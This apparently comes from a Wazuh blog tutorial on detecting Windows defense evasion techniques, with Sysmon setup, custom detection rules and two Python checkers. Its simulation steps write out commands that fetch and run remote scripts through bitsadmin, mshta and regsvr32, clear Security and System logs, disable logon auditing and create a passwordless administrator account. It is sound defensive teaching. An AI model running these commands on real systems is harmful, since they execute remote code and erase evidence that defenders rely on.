Detecting defense evasion techniques with Wazuh


Defense evasion techniques are methods that threat actors use to conceal their presence, bypass security mechanisms, and operate undetected on compromised systems. By evading detection, adversaries can maintain persistence and continue malicious activity even during active monitoring or security scans.

Common defense evasion methods include disabling or uninstalling security tools, tampering with event logs, obfuscating or encrypting malicious code, and abusing trusted system binaries and processes so that malicious activity blends in with legitimate system behavior.

This blog post covers how Wazuh detects common defense evasion techniques that malicious actors use to avoid detection on Windows endpoints.

Infrastructure

We use the following infrastructure to demonstrate the detection of defense evasion techniques with Wazuh:

  • A pre-built, ready-to-use Wazuh OVA 4.12.0, which includes the Wazuh central components (Wazuh server, Wazuh indexer, and Wazuh dashboard). Follow this guide to download and set up the Wazuh virtual machine.
  • A Windows 11 endpoint with the Wazuh agent 4.12.0 installed and enrolled to the Wazuh server. We monitor this endpoint to detect defense evasion techniques.

Sysmon configuration

Sysmon (System Monitor) is a Windows system utility from Microsoft’s Sysinternals suite that provides detailed event logging to help monitor and analyze system activity. It logs detailed information about process creation, network connections, file and registry changes, and other low-level events into the Windows event log. 

Follow the steps below to configure Sysmon on the monitored Windows endpoint and forward logs from the Sysmon event channel to the Wazuh server for analysis:

  1. Download the latest version of Sysmon from the Microsoft Sysinternals page.
  2. Extract the compressed Sysmon file to your preferred location.
  3. Download the Sysmon configuration file using PowerShell as an administrator. Replace <SYSMON_EXECUTABLE_PATH> with the path to your Sysmon executable:
> wget -Uri https://wazuh.com/resources/blog/emulation-of-attack-techniques-and-detection-with-wazuh/sysmonconfig.xml -OutFile <SYSMON_EXECUTABLE_PATH>\sysmonconfig.xml
  4. Switch to the folder containing the Sysmon executable. Run the command below to install and start Sysmon:
> .\Sysmon64.exe -accepteula -i sysmonconfig.xml
  5. Add the following configuration within the <ossec_config> block of the C:\Program Files (x86)\ossec-agent\ossec.conf file to forward Sysmon events to the Wazuh server:
<localfile>
  <location>Microsoft-Windows-Sysmon/Operational</location>
  <log_format>eventchannel</log_format>
</localfile>

6. Restart the Wazuh agent to apply the changes:

> Restart-Service -Name wazuh

Common defense evasion techniques and detection with Wazuh

The MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework is a knowledge base that models the behavior of cyber adversaries. Some commonly used defense evasion techniques from the framework on Windows endpoints include the following:

T1197 – BITS Jobs

Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer service accessed via Component Object Model (COM). It enables applications like updaters and messengers to transfer files in the background using idle network bandwidth, minimizing disruption to other network activity. BITS jobs can be abused by adversaries to persistently execute code and perform background tasks without detection.

Detection rules

1. Create a file defense_evasion_rules.xml in the /var/ossec/etc/rules/ directory of the Wazuh server:

# touch /var/ossec/etc/rules/defense_evasion_rules.xml

2. Add the following rule to the /var/ossec/etc/rules/defense_evasion_rules.xml file:

<group name="windows">
  <rule id="110001" level="5">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.commandLine" type="pcre2">(bitsadmin)(?=.*(/transfer|/download|/priority))</field>
    <description>Suspicious download and execution with BITS job on $(win.system.computer)</description>
    <mitre>
      <id>T1197</id>
    </mitre>
  </rule>
</group>

3. Restart the Wazuh manager for the changes to take effect:

# systemctl restart wazuh-manager

Attack simulation

This test simulates an adversary using bitsadmin.exe, which is available out-of-the-box on Windows, to download a payload. The payload, provided by Atomic Red Team, is used in adversary emulation to demonstrate the BITS Jobs technique. The downloaded file is a text file that contains the description of the BITS Jobs technique. Follow the steps below to simulate the defense evasion technique.

1. Run the command below on the Windows endpoint using Command Prompt:

> bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %localappdata%\Temp\bitsdownload.txt && start %localappdata%\Temp\bitsdownload.txt

2. Navigate to Threat Hunting > Events, then apply the filter rule.id: is 110001 to view the alerts on the Wazuh dashboard.

T1197 - BITS Jobs

After simulating this technique, run the following command using Command Prompt to remove the downloaded file.

> del %localappdata%\Temp\bitsdownload.txt

T1562.002 – Impair Defenses: Disable Windows Event Logging

The Windows event log records key user and system activities such as logins and process creation, providing essential data for security tools and detections. Adversaries may tamper with system-wide logging or just that of a particular application to evade detection.

Detection rules

Wazuh provides the built-in rule 60112 that is triggered when the Windows Audit Policy is changed. 

Attack simulation

The auditpol utility is a Windows command-line tool used to view and configure audit policy settings on a local or remote system. This test simulates an adversary using auditpol to disable auditing for the Account Logon category, so that neither successful nor failed authentication events are recorded in the event logs. Follow the steps below to simulate the defense evasion technique.

1. Run the command below on the Windows endpoint using PowerShell with administrator privileges:

> auditpol /set /category:"Account Logon" /success:disable /failure:disable

2. Navigate to Threat Hunting > Events, then apply the filter rule.id: is 60112 to view the alerts on the Wazuh dashboard. 

T1562.002 - Impair Defenses: Disable Windows Event Logging

After simulating this technique, run the following command using PowerShell with administrator privileges to restore the audit policy.

> auditpol /set /category:"Account Logon" /success:enable /failure:enable

T1070.001 – Indicator Removal: Clear Windows Event Logs

Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs keep a record of events on a Windows endpoint. These logs provide valuable information for troubleshooting issues, monitoring system performance, and threat detection. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.

Detection rules

Wazuh provides the built-in rules 63103 and 63104 to detect log clearing activities. Rule 63103 is triggered when the Security event log is cleared, while rule 63104 detects the clearing of any other log, such as System or Application.

Attack simulation

The Windows Events Utility, wevtutil, is a built-in command-line tool in Windows used to manage Event Logs and Event Log configurations. Attackers can abuse the wevtutil utility to clear Windows event logs and cover their tracks after performing malicious actions. This test simulates an adversary using the wevtutil to clear the System and Security logs. Follow the steps below to simulate the defense evasion technique.

1. Run the command below on the Windows endpoint using PowerShell with administrator privileges:

> wevtutil cl System; wevtutil cl Security

2. Navigate to Threat Hunting > Events, then apply the filter rule.id: is one of 63103,63104 to view the alerts on the Wazuh dashboard. 

T1070.001 - Indicator Removal: Clear Windows Event Logs

T1070.009 – Indicator Removal: Clear Persistence

Adversaries may clear artifacts of persistence to erase evidence of their presence on a compromised system. This includes removing services, deleting executables, modifying the registry, removing scheduled tasks, or performing other cleanup actions. They may also delete user accounts previously created for persistent access, making it harder for defenders to trace or investigate their activity.

Detection rules

Wazuh provides the following built-in rules to detect changes to user accounts and group memberships:

  • Rule ID 60109 – when a user account is enabled or created.
  • Rule ID 60110 – when a user account is changed.
  • Rule ID 60111 – when a user account is disabled or deleted.
  • Rule ID 60154 – when the administrators group changes.
  • Rule ID 60160 – when the domain users group changes.

Attack simulation

We simulate an attacker creating a local user account for persistence, then later deleting it during the cleanup phase to evade detection. Follow the steps below to simulate the defense evasion technique.

1. Run the commands below on the Windows endpoint using PowerShell with administrator privileges to simulate the account creation and deletion. The commands create a new local account with the username T1070, add it to the local Administrators group, and finally delete the newly created user:

> New-LocalUser -Name "T1070" -NoPassword
> Add-LocalGroupMember -Group "Administrators" -Member "T1070"
> Remove-LocalUser -Name "T1070"

2. Navigate to Threat Hunting > Events, then apply the filter rule.id: is one of 60109, 60110, 60111, 60154, 60160 to view the alerts on the Wazuh dashboard. 

Indicator Removal: Clear Persistence

T1218.005 – System Binary Proxy Execution: Mshta

The mshta.exe tool is a Windows utility used to execute Microsoft HTML Applications (HTA), which run outside the browser using Internet Explorer technologies. Adversaries may abuse mshta.exe to execute malicious HTA files, JavaScript, or VBScript, using its trusted status to bypass application control and browser security settings. Because it operates outside Internet Explorer’s security context, it can evade restrictions that typically apply within the browser.

Detection rules

1. Add the following rule to the defense_evasion_rules.xml file:

<group name="windows">
  <rule id="110002" level="5">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.commandLine" type="pcre2">(mshta)(?=.*(exec|close))</field>
    <description>Suspicious execution of a remote script with MSHTA on $(win.system.computer)</description>
    <mitre>
      <id>T1218.005</id>
    </mitre>
  </rule>
</group>

2. Restart the Wazuh manager for the changes to take effect:

# systemctl restart wazuh-manager

Attack simulation

This test simulates an adversary using mshta.exe to execute a remote payload. The payload, provided by Atomic Red Team, is used in adversary emulation to demonstrate the execution of a remote script using the mshta.exe tool. Upon execution, the calculator app calc.exe will be launched. Follow the steps below to simulate the defense evasion technique.

1. Run the command below on the Windows endpoint using Command Prompt:

> mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();

2. Navigate to Threat Hunting > Events, then apply the filter rule.id: is 110002 to view the alerts on the Wazuh dashboard. 

System Binary Proxy Execution: Mshta

T1218.010 – System Binary Proxy Execution: Regsvr32

The regsvr32.exe tool is a command-line program used to register and unregister object linking and embedding controls, including Dynamic Link Libraries (DLLs), on Windows systems. It can also be used to bypass application control by loading COM scriptlets that execute DLLs under user permissions. Since regsvr32.exe supports network and proxy communication, attackers can pass a URL to a remote script as an argument, allowing it to be retrieved and executed on the endpoint. This capability enables adversaries to abuse regsvr32.exe to execute malicious code.

Detection rules

1. Add the following rule to the defense_evasion_rules.xml file:

<group name="windows">
  <rule id="110003" level="5">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.commandLine" type="pcre2">(regsvr32)(?=.*(/s|/u|/i|scrobj))</field>
    <description>Suspicious remote code execution with Regsvr32 on $(win.system.computer)</description>
    <mitre>
      <id>T1218.010</id>
    </mitre>
  </rule>
</group>

2. Restart the Wazuh manager for the changes to take effect:

# systemctl restart wazuh-manager
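The three custom rules in this post (110001, 110002 and 110003) all key on a PCRE2 lookahead over the Sysmon command line. As an added example, not code from the post or from Wazuh, the following Python script applies those same patterns to constructed process-creation events, including benign and edge-case command lines, to show what fires and what does not; the event dictionaries and their `parent_sid` field are this example's own simplification of the 61603 rule chain, not Wazuh's event format.

```python
import re

# The three custom rules from this post: rule id -> PCRE2 pattern that Wazuh
# applies to win.eventdata.commandLine. Python's re module accepts the same
# lookahead syntax, so the patterns are used verbatim.
CUSTOM_RULES = {
    110001: r"(bitsadmin)(?=.*(/transfer|/download|/priority))",
    110002: r"(mshta)(?=.*(exec|close))",
    110003: r"(regsvr32)(?=.*(/s|/u|/i|scrobj))",
}
COMPILED = {rid: re.compile(pat) for rid, pat in CUSTOM_RULES.items()}

# Parent rule named in each rule's if_sid: Sysmon Event ID 1, process creation.
SYSMON_PROCESS_CREATE_SID = 61603


def matching_rules(event):
    """Return the custom rule ids whose pattern matches the event's command line.

    Mirrors the rule chain in the post: a custom rule can only fire on an
    event that the parent rule 61603 already matched. The 'parent_sid' key is
    this example's simplified stand-in for that chain, not Wazuh's event format.
    """
    if event.get("parent_sid") != SYSMON_PROCESS_CREATE_SID:
        return []
    return [rid for rid, rx in COMPILED.items() if rx.search(event.get("commandLine", ""))]


# Constructed sample events modelled on the post's simulations (URLs replaced
# with example.invalid), plus benign and edge-case command lines that a
# defender should confirm do not fire.
SAMPLE_EVENTS = [
    {"parent_sid": 61603, "commandLine": "bitsadmin.exe /transfer /Download /priority Foreground https://example.invalid/T1197.md C:\\Temp\\bitsdownload.txt"},
    {"parent_sid": 61603, "commandLine": "mshta.exe javascript:a=(GetObject('script:https://example.invalid/mshta.sct')).Exec();close();"},
    {"parent_sid": 61603, "commandLine": "regsvr32.exe /s /u /i:https://example.invalid/RegSvr32.sct scrobj.dll"},
    {"parent_sid": 61603, "commandLine": "regsvr32.exe C:\\Program Files\\Vendor\\vendor.dll"},  # ordinary DLL registration
    {"parent_sid": 61603, "commandLine": "bitsadmin.exe /list"},  # no transfer verb for the lookahead
    {"parent_sid": 61603, "commandLine": "Mshta.exe javascript:close();"},  # patterns are case sensitive as written
    {"parent_sid": None, "commandLine": "mshta.exe javascript:close();"},  # not a process-creation event
]


def evaluate(events=SAMPLE_EVENTS):
    """Map each command line to the list of custom rule ids it would trigger."""
    return {e["commandLine"]: matching_rules(e) for e in events}


if __name__ == "__main__":
    for cmd, ids in evaluate().items():
        print(ids or "no custom rule", "<-", cmd)
```

Note that the bitsadmin sample fires on /transfer rather than on /Download, and the capitalised Mshta.exe sample does not fire at all: the patterns are case sensitive as written, and a (?i) prefix would make them case-insensitive in both PCRE2 and Python.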

Attack simulation

This test simulates an adversary using regsvr32.exe to execute a remote COM scriptlet. The scriptlet file, provided by Atomic Red Team, is used in adversary emulation to demonstrate how threat actors can abuse regsvr32.exe. Upon execution, the calculator app calc.exe will be launched. Follow the steps below to simulate the defense evasion technique.

1. Run the command below on the Windows endpoint using Command Prompt:

> regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll

2. Navigate to Threat Hunting > Events, then apply the filter rule.id: is 110003 to view the alerts on the Wazuh dashboard.

System Binary Proxy Execution: Regsvr32

T1014 – Rootkit

Rootkits are programs designed to conceal the presence of malware by intercepting or hooking operating system API calls that return system information. Adversaries may use rootkits to hide processes, files, network connections, services, drivers, and other system components. Some rootkits also interfere with system functionality by preventing antivirus software from downloading database updates or obstructing the installation of security patches. They may also alter system configurations to block access to trusted domains. This tactic ensures that security tools remain outdated or ineffective, allowing attackers to operate undetected for extended periods.

Detection rules

Wazuh detects rootkit activity using the Rootcheck module. The module is enabled by default on monitored endpoints and continuously checks for anomalies and known signatures. This enables the detection of both signature-based threats and stealthy malware that may evade traditional detection methods.

Attack simulation

This test simulates malware behavior that blocks security updates by modifying the endpoint’s hosts file. The hosts file is a local configuration file that maps domain names to IP addresses. By altering it, malware can redirect or block connections to trusted update servers, preventing antivirus software and operating systems from downloading critical patches. Follow the steps below on the Windows endpoint to simulate the defense evasion technique.

1. Run the commands below using PowerShell with administrator privileges to simulate malicious modification of the hosts file. The commands back up the hosts file and modify it to block connections to the Microsoft website. 

> Copy-Item -Path "C:\Windows\System32\drivers\etc\hosts" -Destination "C:\Windows\System32\drivers\etc\hosts.bak" -Force

> Add-Content -Path "C:\Windows\System32\drivers\etc\hosts" -Value "`n127.0.0.1 microsoft.com"

2. By default, the Rootcheck module runs scans every 12 hours. Run the command below to restart the Wazuh agent and trigger a Rootcheck scan.

> Restart-Service -Name wazuh

3. Navigate to Threat Hunting > Events, then apply the filter rule.id: is 513 to view the alerts on the Wazuh dashboard.

Rootkit

After simulating this technique, run the command below using PowerShell with administrator privileges to restore the C:\Windows\System32\drivers\etc\hosts file.

> Copy-Item -Path "C:\Windows\System32\drivers\etc\hosts.bak" -Destination "C:\Windows\System32\drivers\etc\hosts" -Force
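The hosts-file tampering simulated above can also be checked directly. As an added example that is neither Rootcheck's own logic nor code from the post, the following Python script parses hosts-file text and flags entries that pin Microsoft or Windows Update domains (a constructed watch list) to a loopback or unspecified address; the sample hosts content is constructed to mirror the line the simulation appends.

```python
import ipaddress

# Domains an endpoint must keep resolving to receive security updates; the
# post's simulation pins microsoft.com to 127.0.0.1. Constructed watch list
# for this example, not a Rootcheck signature.
UPDATE_DOMAINS = ("microsoft.com", "windowsupdate.com")


def parse_hosts(text):
    """Yield (ip, hostname) pairs from hosts-file text, ignoring comments and blank lines."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop trailing or whole-line comments
        if not line:
            continue
        ip, *names = line.split()
        for name in names:  # one address may carry several hostnames
            yield ip, name.lower()


def suspicious_entries(text):
    """Return (ip, hostname) pairs that pin a watched domain or subdomain to a loopback or 0.0.0.0 address."""
    findings = []
    for ip, name in parse_hosts(text):
        if not any(name == d or name.endswith("." + d) for d in UPDATE_DOMAINS):
            continue
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            findings.append((ip, name))  # malformed address on a watched domain is itself worth a look
            continue
        if addr.is_loopback or addr.is_unspecified:
            findings.append((ip, name))
    return findings


# Constructed hosts file: the stock Windows comment header, a benign lab entry,
# the line the post's simulation appends, and a 0.0.0.0 sinkhole variant.
SAMPLE_HOSTS = """# Copyright (c) 1993-2009 Microsoft Corp.
# localhost name resolution is handled within DNS itself.
#\t127.0.0.1       localhost
10.0.0.5    lab-fileserver.internal
127.0.0.1 microsoft.com
0.0.0.0 download.windowsupdate.com   # appended by the simulated malware
"""

if __name__ == "__main__":
    for ip, name in suspicious_entries(SAMPLE_HOSTS):
        print(f"suspicious hosts entry: {ip} {name}")
```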

Conclusion

This post demonstrates how Wazuh detects defense evasion techniques on Windows endpoints by utilizing a combination of built-in and custom rules. We simulated various techniques used by threat actors for defense evasion and detected them with Wazuh. To enhance visibility, we enriched logs from the victim endpoint by integrating Sysmon logs with Wazuh, applying custom rules for certain techniques and relying on built-in rules for others.

If you have any questions about this blog post or Wazuh, we invite you to join our community, where our team will be happy to assist you.

Reference

Atomic Red Team Tests

Defense Evasion, Tactic TA0005 – Enterprise | MITRE ATT&CK®